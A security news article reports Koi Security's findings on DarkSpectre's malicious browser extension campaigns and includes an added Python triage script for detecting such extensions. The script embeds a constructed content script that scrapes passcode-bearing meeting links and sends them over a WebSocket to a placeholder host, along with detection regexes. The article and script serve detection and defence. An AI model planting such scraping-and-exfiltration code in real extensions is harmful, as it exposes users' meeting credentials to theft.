
In a short period, researchers from Koi Security have uncovered three malicious browser extension campaigns that have impacted millions of browser users worldwide. The same Chinese threat actor is thought to be behind the campaigns.
“This is the first time we've found a well-funded criminal organization responsible for several of the largest and most sophisticated campaigns we’ve ever uncovered,” said the researchers.
They explained that the latest attack campaign has impacted 2.2 million users of Google Chrome, Microsoft Edge, and Mozilla Firefox. The threat actor allegedly behind the campaign is tracked under the moniker DarkSpectre.
According to Koi Security, the campaign, codenamed The Zoom Stealer, uses a set of 18 extensions across Chrome, Edge, and Firefox to gather corporate intelligence, collecting online meeting data such as meeting URLs with embedded passwords, meeting IDs, topics, descriptions, scheduled times, and registration status.
Most of the extensions are built to mimic helper tools for enterprise videoconferencing services such as Google Meet, Zoom, and GoTo Webinar, and they exfiltrate meeting links, credentials, and participant lists in real time over a WebSocket connection.
They can also harvest details about webinar speakers and hosts, along with session metadata, whenever a user who has one of the malicious extensions installed visits a webinar registration page in the browser.
“This isn't consumer fraud – this is corporate espionage infrastructure,” researchers Tuval Admoni and Gal Hachamov said.
“The Zoom Stealer represents something more targeted: systematic collection of corporate meeting intelligence. Users got what was advertised. The extensions earned trust and positive reviews. Meanwhile, surveillance ran silently in the background.”
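The traits described above (content scripts scoped to meeting sites, code that looks for join links carrying a passcode, and a WebSocket opened to an unrelated host) can be checked for statically in an unpacked extension. The script below is an added example written for this page, not Koi Security's tooling or code from the campaign; the target domain list, the regexes, and the sample extension it writes (including the placeholder endpoint wss://example.invalid/collect) are constructed assumptions for illustration.

```python
"""Added example: static triage of an unpacked browser extension for the
combination the article describes. Not Koi Security's code; the sample
extension and the wss://example.invalid/collect endpoint are constructed."""
import json
import re
import tempfile
from pathlib import Path

# Sites the article names as targets (Google Meet, Zoom, GoTo Webinar); assumed list.
MEETING_DOMAINS = ("zoom.us", "meet.google.com", "goto.com", "gotowebinar.com")

# `new WebSocket("wss://...")` with a literal URL.
WS_RE = re.compile(r"new\s+WebSocket\s*\(\s*['\"](wss?://[^'\"]+)['\"]")
# Source that hunts for join links with an embedded passcode (Zoom's ?pwd=...)
# or a numeric Zoom meeting-ID path.
JOIN_LINK_RE = re.compile(r"pwd=|/j/\d{9,11}")


def _is_meeting_site(pattern: str) -> bool:
    return any(d in pattern for d in MEETING_DOMAINS)


def triage_extension(ext_dir) -> list:
    """Return (kind, detail) findings for the unpacked extension at ext_dir."""
    ext_dir = Path(ext_dir)
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    findings = []

    # 1. Which meeting sites does the extension inject into or request access to?
    scoped = set()
    for cs in manifest.get("content_scripts", []):
        scoped.update(m for m in cs.get("matches", []) if _is_meeting_site(m))
    for perm in manifest.get("host_permissions", []) + manifest.get("permissions", []):
        if _is_meeting_site(perm):
            scoped.add(perm)
    if scoped:
        findings.append(("meeting_scope", sorted(scoped)))

    # 2. Scan every script for WebSocket exfil to a third-party host and for
    #    join-link harvesting logic.
    for js in sorted(ext_dir.rglob("*.js")):
        src = js.read_text(encoding="utf-8", errors="ignore")
        for url in WS_RE.findall(src):
            host = url.split("//", 1)[1].split("/", 1)[0]
            if not _is_meeting_site(host) and host not in ("localhost", "127.0.0.1"):
                findings.append(("websocket_exfil", f"{js.name} -> {url}"))
        if JOIN_LINK_RE.search(src):
            findings.append(("join_link_harvest", js.name))
    return findings


# Constructed sample extension (not a real one from the campaign).
_MANIFEST = {
    "manifest_version": 3,
    "name": "Meeting Helper (constructed sample)",
    "version": "1.0",
    "host_permissions": ["*://*/*"],
    "content_scripts": [
        {"matches": ["*://*.zoom.us/*", "*://meet.google.com/*"], "js": ["content.js"]}
    ],
}

_EXFIL_SCRIPT = """
// Constructed sample of the behaviour described: scrape join links that carry
// a passcode and relay them, plus the page title, over a WebSocket.
const ws = new WebSocket("wss://example.invalid/collect");  // placeholder host
const links = [...document.querySelectorAll("a[href*='pwd=']")].map(a => a.href);
ws.onopen = () => ws.send(JSON.stringify({ links, title: document.title }));
"""

_BENIGN_SCRIPT = """
// Constructed benign script: touches page styling only, no network use.
document.body.style.outline = "2px solid #0a0";
"""


def write_sample_extension(ext_dir, exfil: bool = True) -> Path:
    ext_dir = Path(ext_dir)
    ext_dir.mkdir(parents=True, exist_ok=True)
    (ext_dir / "manifest.json").write_text(json.dumps(_MANIFEST), encoding="utf-8")
    script = _EXFIL_SCRIPT if exfil else _BENIGN_SCRIPT
    (ext_dir / "content.js").write_text(script, encoding="utf-8")
    return ext_dir


def triage_sample(exfil: bool = True) -> list:
    """Write the constructed sample into a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        return triage_extension(write_sample_extension(tmp, exfil))


if __name__ == "__main__":
    for kind, detail in triage_sample(exfil=True):
        print(f"{kind}: {detail}")
```

Run it against a real unpacked extension directory with `triage_extension(path)`. A `meeting_scope` hit on its own is expected for a legitimate meeting helper; it is the pairing with `websocket_exfil` to a host unrelated to the meeting service, or with `join_link_harvest`, that warrants a closer look. This is a heuristic: it inspects literal source only, so a loader that pulls its payload from an image file, as the GhostPoster campaign did, or builds the WebSocket URL at runtime will not be caught without dynamic analysis.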
The first campaign, ShadyPanda, was unmasked by Koi Security earlier in December. It was found to affect 5.6 million users by facilitating data theft, search query hijacking, and affiliate fraud.
The second campaign, GhostPoster, was found hiding malicious JavaScript inside Firefox extension logo files. Once installed, the co-opted extensions allow attackers to gain full control of the victim’s browser.
The attribution to a Chinese actor rests on clues such as the consistent use of command-and-control servers hosted on Alibaba Cloud, ICP registrations linked to Chinese provinces such as Hubei, code artifacts containing Chinese-language strings and comments, and fraud schemes aimed specifically at Chinese e-commerce platforms such as JD.com and Taobao.